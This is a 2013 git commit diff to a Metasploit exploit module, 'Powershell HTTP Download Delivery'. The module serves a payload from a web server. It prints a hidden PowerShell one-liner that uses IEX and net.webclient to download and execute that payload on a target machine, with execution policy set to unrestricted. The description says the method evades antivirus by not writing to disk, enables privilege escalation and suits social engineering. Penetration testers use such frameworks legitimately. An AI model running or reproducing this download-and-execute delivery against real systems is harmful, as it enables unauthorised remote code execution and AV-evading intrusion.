Final updates and tidy

Meatballs1 · Meatballs1 · commit 18ac83bec188 · 2013-07-24T17:28:19.000+01:00
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,14 +14,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'Powershell HTTP Downloader',
+			'Name'		 => 'Powershell HTTP Download Delivery',
 			'Description'	 => %q{
 				Quickly fires up a web server that serves the payload in powershell.
-				Two commands are given, the first will download and execute the payload
-				from within a powershell terminal. The second will start powershell and
-				then download and execute the payload. The main goal of this module is
-				so that a session can be quickly established on a target machine when
-				you have to manually type in the command yourself.
+				The command will start powershell and then download and execute the payload.
+				You can extract the IEX command to execute directly from powershell.
+				The main goal of this module is	that a session can be quickly established
+				on a target machine when you have to manually type in the command yourself,
+				e.g. RDP Session, Local Access or maybe Remote Command Exec.
+				This does not write to disk so is unlikely to trigger AV solutions and will
+				allow you to attempt local privilege escalations supplied by meterpreter etc.
+				You could also try your luck with social engineering.
+				Ensure your payload architecture matches the target computer or use SYSWOW64
+				powershell.exe to execute x86 payloads on x64 machines.
 			},
 			'License'	 => MSF_LICENSE,
 			'Author'	 =>
@@ -47,19 +52,13 @@ def on_request_uri(cli, request)
 		print_status("Delivering Payload")
 		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
 		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
-		return
-
 	end
 
-	def exploit
-		datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)
-		url = (datastore['SSL'] ? "https://" : "http://")
-		url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
-		url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
+	def primer
+		url = get_uri()
 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-		print_good(download_and_run)
-		print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
-		print_line
-		super
+		print_status("Run the following command on the target machine:")
+		print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
 	end
 end
+
